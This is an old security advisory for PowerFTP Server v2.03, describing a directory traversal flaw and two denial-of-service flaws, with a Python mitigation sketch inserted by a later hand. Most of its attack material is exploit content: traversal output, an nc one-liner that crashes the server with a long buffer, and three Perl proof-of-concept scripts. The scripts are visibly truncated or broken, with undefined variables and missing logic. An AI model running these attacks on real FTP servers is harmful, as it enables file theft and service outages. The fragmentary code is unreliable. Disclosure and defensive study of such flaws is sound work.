PowerFTP Directory Traversal and DoS Vulnerabilities
30 Nov. 2001
Summary
PowerFTP is a powerful FTP client/server software. Three security vulnerabilities have been found in the product: one allows access to files that reside outside the chained FTP root directory, another causes the product to crash when it is sent a long buffer, and the last one consumes all available CPU when the floppy drive is accessed.
Credit:
The information has been provided by al3x hernandez.
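Mitigation sketch for the three issues summarised above, as an added example that is not part of the original advisory and not PowerFTP code: a server-side check that caps command length, refuses drive-letter and UNC paths before touching the disk, and confines every path to the FTP root. The root path, the length cap, the verb list and the function names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, importable on any OS

FTP_ROOT = r"C:\ftproot"   # assumed server root (constructed value)
MAX_LINE = 512             # assumed cap on one command line, in bytes
PATH_VERBS = {"LIST", "NLST", "CWD", "RETR", "STOR", "DELE", "MKD", "RMD"}

def resolve(root, cwd, arg):
    """Map a client path to a real path under root, or None if it escapes.

    Lexical check only: junctions or symlinks inside root are not followed.
    """
    arg = arg.replace("/", "\\")
    drive, rest = ntpath.splitdrive(arg)
    if drive:
        # "a:/", "c:\..." or a UNC share: the client never picks the volume,
        # so the floppy (or any other drive) is refused before any disk I/O.
        return None
    # A leading slash means the virtual root, not the root of the disk.
    base = root if rest.startswith("\\") else ntpath.join(root, cwd)
    candidate = ntpath.normpath(ntpath.join(base, rest.lstrip("\\")))
    want = ntpath.normcase(ntpath.normpath(root))
    have = ntpath.normcase(candidate)
    # Compare on a component boundary so C:\ftproot2 does not pass as C:\ftproot.
    if have == want or have.startswith(want + "\\"):
        return candidate
    return None

def check_command(line, cwd=""):
    """Return (reply_code, detail) for one raw command line (bytes)."""
    if len(line) > MAX_LINE:
        # Enforce the cap while reading from the socket, before parsing.
        return 500, "command line too long"
    text = line.decode("latin-1").rstrip("\r\n")
    verb, _, arg = text.partition(" ")
    if verb.upper() in PATH_VERBS:
        real = resolve(FTP_ROOT, cwd, arg)
        if real is None:
            return 550, "path outside FTP root"
        return 200, real
    return 200, ""
```

The 500 and 550 values follow the FTP reply codes for an over-long command line and for an unavailable file; everything else in the block is illustrative.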
Directory Traversal:
Example:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
Exploit:
#!/usr/bin/perl
# Simple script to view the files from the ftp server,
# even if they are outside of root directory.
#
# This script assumes the OS is WinNT/2k/W.x and looks
# for the IIS directories.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_data.pl -s <server>
#
# Examples:
#
# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
# perl -x PowerFTP_data.pl -s 10.0.0.1
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);
$CRLF = "\015\012";
@drives = ("c","d","e"); # Possible remote drives
# If you need to read the floppy drive A, add this line
# @drives = ("a","c","d","e","f".......etc,etc
$port = 21;
$login = 'temp'; # You may need to change this
$pass = 'temp'; # You may need to change this
Denial of Service:
Example:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
The server then crashes, resulting in a denial of service.
Exploit:
#!/usr/bin/perl
# Simple script to send a long command of 'A's to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\nUsage: $0 -s <server>\n\n");}
Exploit: (DoS attack via floppy)
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");